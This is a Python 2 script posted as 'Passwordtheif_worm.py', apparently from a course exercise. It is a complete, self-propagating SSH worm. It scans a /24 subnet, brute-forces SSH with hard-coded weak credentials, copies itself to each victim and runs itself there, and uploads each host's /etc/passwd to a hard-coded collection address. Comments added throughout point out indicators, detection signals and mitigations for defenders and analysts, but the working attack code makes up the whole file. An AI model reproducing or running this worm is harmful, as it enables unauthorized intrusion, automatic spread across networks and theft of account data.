aaron999

Passwordtheif_worm.py

Jan 30th, 2018
  1. import paramiko
  2. import sys
  3. import socket
  4. import nmap
  5. import os
  6. import sys
  7. import struct
  8. import fcntl
  9. import netifaces
  10.  
  11. # Hard-coded (username, password) pairs tried against every SSH host found; the list only works against accounts with weak or default passwords.
  12. credList = [
  13. ('hello', 'world'),
  14. ('hello1', 'world'),
  15. ('root', '#Gig#'),
  16. ('cpsc', 'cpsc'),
  17. ('ubuntu', '123456')
  18. ]
  19.  
  20. # Marker file: checked locally at start-up and on remote hosts before copying. Its presence under /tmp is a host indicator for this sample.
  21. INFECTED_MARKER_FILE = "/tmp/infected.txt"
  22. SENDIP  = "192.168.1.6"  # hard-coded SFTP destination used by getSendPass() for the /etc/passwd upload
  23. ##################################################################
  24. # Returns whether the worm should spread
  25. # @return - True if the infection succeeded and false otherwise
  26. ##################################################################
  27. def isInfectedSystem(ssh):
  28.     # Checks the remote host behind `ssh` (the client
  29.     # returned by attackSystem) for the marker file by
  30.     # calling stat() on it over SFTP. The bare except
  31.     # below maps every failure, not only a missing file,
  32.     # to False. Defenders: the marker path is a host IoC.
  33.     try:
  34.         sftpClient = ssh.open_sftp()
  35.         sftpClient.stat(INFECTED_MARKER_FILE)
  36.         return True
  37.     except:
  38.         return False   
  39.  
  40. #################################################################
  41. # Marks the system as infected
  42. #################################################################
  43. def markInfected():
  44.    
  45.     # Creates the marker file on the local system by
  46.     # writing a fixed sentence to INFECTED_MARKER_FILE.
  47.     # That fixed content can serve as a file signature.
  48.     file_obj = open(INFECTED_MARKER_FILE, "w")
  49.     file_obj.write("Has anyone really been far as decided to use even go want to do more like?")
  50.     file_obj.close()
  51. ###############################################################
  52. # Spread to the other system and execute
  53. # @param sshClient - the instance of the SSH client connected
  54. # to the victim system
  55. ###############################################################
  56. def spreadAndExecute(sshClient):
  57.    
  58.     # Copies this script to the host behind sshClient
  59.     # over SFTP and starts it there. The local source
  60.     # is /tmp/passwordthief_worm.py, or the relative
  61.     # file name when the first CLI argument is --host.
  62.     # The remote copy is made world-executable and run
  63.     # with nohup in the background. Detection: an SSH
  64.     # session that writes a .py file under /tmp and
  65.     # then launches python on it. Mitigation: key-only
  66.     # SSH authentication and removal of default or
  67.     # weak-password accounts.
  68.     wormLoc = "/tmp/passwordthief_worm.py" 
  69.     if len(sys.argv) >= 2:
  70.         if sys.argv[1] == "--host":
  71.             wormLoc = "passwordthief_worm.py"
  72.     sftpClient = sshClient.open_sftp()
  73.     sftpClient.put(wormLoc, "/tmp/passwordthief_worm.py")
  74.     sshClient.exec_command("chmod a+x /tmp/passwordthief_worm.py")
  75.     sshClient.exec_command("nohup python /tmp/passwordthief_worm.py &")
  76.    
  77.  
  78.  
  79. ############################################################
  80. # Try to connect to the given host given the existing
  81. # credentials
  82. # @param host - the host system domain or IP
  83. # @param userName - the user name
  84. # @param password - the password
  85. # @param sshClient - the SSH client
  86. # return - 0 = success, 1 = probably wrong credentials, and
  87. # 3 = probably the server is down or is not running SSH
  88. ###########################################################
  89. def tryCredentials(host, userName, _password, sshClient):
  90.    
  91.     # Makes one password-authenticated SSH connection
  92.     # attempt to host with userName/_password on the
  93.     # supplied paramiko client.
  94.     #
  95.     # Return values, as implemented below:
  96.     #   0 - connect() returned without raising
  97.     #   1 - paramiko AuthenticationException
  98.     #   3 - socket.error
  99.     # Any other exception, including other
  100.     # paramiko.SSHException subclasses, is not caught
  101.     # here and propagates to the caller.
  102.     #
  103.     # Defender view: every return of 1 corresponds to
  104.     # a failed password login that the target's SSH
  105.     # daemon can log. Repeated failures for several
  106.     # user names from one source address are the
  107.     # signal to alert on; account lockout, rate
  108.     # limiting and disabling password authentication
  109.     # remove the weakness this relies on.
  110.     try:
  111.         sshClient.connect(host, username=userName, password=_password)
  112.         return 0
  113.     except paramiko.ssh_exception.AuthenticationException:
  114.         return 1
  115.     except socket.error:
  116.         return 3
  117.        
  118.  
  119. ###############################################################
  120. # Wages a dictionary attack against the host
  121. # @param host - the host to attack
  122. # @return - the instance of the SSH paramiko class and the
  123. # credentials that work in a tuple (ssh, username, password).
  124. # If the attack failed, returns None
  125. ###############################################################
  126. def attackSystem(host):
  127.    
  128.     # Uses the module-level credential list
  129.     global credList
  130.    
  131.     # One paramiko client is reused for every attempt
  132.     ssh = paramiko.SSHClient()
  133.  
  134.     # AutoAddPolicy accepts unknown host keys without verification.
  135.     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  136.    
  137.                
  138.     # Try each credential pair in order
  139.     for (username, password) in credList:
  140.        
  141.         # tryCredentials() result handling:
  142.         #   0 - return (ssh, username, password)
  143.         #   1 - move on to the next pair
  144.         #   3 - stop trying this host
  145.         # Each branch of the if/elif chain calls
  146.         # tryCredentials() again, so one pair can
  147.         # produce more than one connection attempt
  148.         # in the target's authentication log.
  149.         # The working password is printed in clear
  150.         # text on success, so it appears in whatever
  151.         # captures this process's standard output.
  152.         if tryCredentials(host, username, password, ssh) == 0:
  153.             print "Success with " + host + " " +  username + " " + password
  154.             return (ssh, username, password)
  155.         elif tryCredentials(host, username, password, ssh) == 1:
  156.             print "Wrong Credentials on host " + host
  157.             continue
  158.         elif tryCredentials(host, username, password, ssh) == 3:
  159.             print "No SSH client on " + host
  160.             break #no ssh client so just stop
  161.     # No pair worked, or the loop stopped on code 3
  162.     return None
  163.  
  164. ####################################################
  165. # Returns the IP of the current system
  166. # @param interface - the interface whose IP we would
  167. # like to know
  168. # @return - The IP address of the current system
  169. ####################################################
  170. def getMyIP(interface):
  171.     # Returns the first interface address that is not
  172.     # 127.0.0.1, or None. `interface` is not read here.
  173.         # Interfaces are enumerated with netifaces
  174.  
  175.         # Get all the network interfaces on the system
  176.         networkInterfaces = netifaces.interfaces()
  177.  
  178.         # Result; stays None if no non-loopback address is found
  179.         ipAddr = None
  180.  
  181.         # Go through all the interfaces
  182.         for netFace in networkInterfaces:
  183.  
  184.                 # First address under family key 2 (presumably AF_INET, i.e. IPv4 - confirm)
  185.                 addr = netifaces.ifaddresses(netFace)[2][0]['addr']
  186.  
  187.                 # Skip the loopback address
  188.                 if not addr == "127.0.0.1":
  189.  
  190.                         # Save the IP address and stop at the first match
  191.                         ipAddr = addr
  192.                         break
  193.  
  194.         return ipAddr
  195.  
  196.  
  197. def getSendPass():  # Uploads this host's /etc/passwd to SENDIP over SFTP.
  198.     ssh=paramiko.SSHClient()
  199.     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # unknown host keys are accepted without verification
  200.     ssh.connect(SENDIP, username='ubuntu', password='123456')  # hard-coded account on the collection host
  201.     sftpClient = ssh.open_sftp()  # triage note: with shadow passwords enabled, /etc/passwd lists accounts but not password hashes
  202.     getIP = getMyIP(b"etho0")  # local address, used only to name the uploaded file
  203.     sftpClient.put("/etc/passwd", "sshpasses/passwd"+str(getIP) + ".txt")  # detection: outbound SSH/SFTP from a host that does not normally initiate it
  204.                                                              
  205.  
  206. #######################################################
  207. # Returns the list of systems on the same network
  208. # @return - a list of IP addresses on the same network
  209. #######################################################
  210. def getHostsOnTheSameNetwork():
  211.    
  212.     # Scans the hard-coded 192.168.1.0/24 range with
  213.     # python-nmap and returns the hosts reported "up",
  214.     # minus this machine's own address. Detection: a
  215.     # port sweep of a whole subnet from one internal host.
  216.     portScanner = nmap.PortScanner()
  217.     portScanner.scan('192.168.1.0/24', arguments='-p -22 --open')
  218.     hostInfo = portScanner.all_hosts();
  219.     liveHosts = []
  220.     ip_add = getMyIP(b"eth0")
  221.     for host in hostInfo:
  222.         if portScanner[host].state() == "up" and host != ip_add:
  223.             liveHosts.append(host)
  224.  
  225.     return liveHosts
  226.  
  227. # Script entry: the subnet scan runs first, before the local marker check
  228. networkHosts = getHostsOnTheSameNetwork()
  229. #print "Found hosts: ", networkHosts
  230. if not os.path.exists(INFECTED_MARKER_FILE):  # no local marker yet: create it and continue
  231.     markInfected()
  232. else:
  233.     print "Already Infected"
  234.     sys.exit()
  235.  
  236. if len(sys.argv) >=2:  # any command-line argument skips the /etc/passwd upload
  237.     print "Dont get our own passes"
  238. else:
  239.     getSendPass()
  240.  
  241. # Try each discovered host; the process exits after the first successful copy
  242. for host in networkHosts:
  243.    
  244.     # None, or (ssh, username, password) when a login worked
  245.     sshInfo =  attackSystem(host)
  246.    
  247.     print sshInfo
  248.    
  249.    
  250.     # A working login was found; hosts that already carry the marker file are skipped
  251.     if sshInfo:
  252.        
  253.         print "Trying to spread"
  254.         if isInfectedSystem(sshInfo[0]) == True:
  255.             print "Remote System is Infected"
  256.             continue
  257.         else:
  258.             spreadAndExecute(sshInfo[0])
  259.             print "Spreading complete on " + host  
  260.             sys.exit()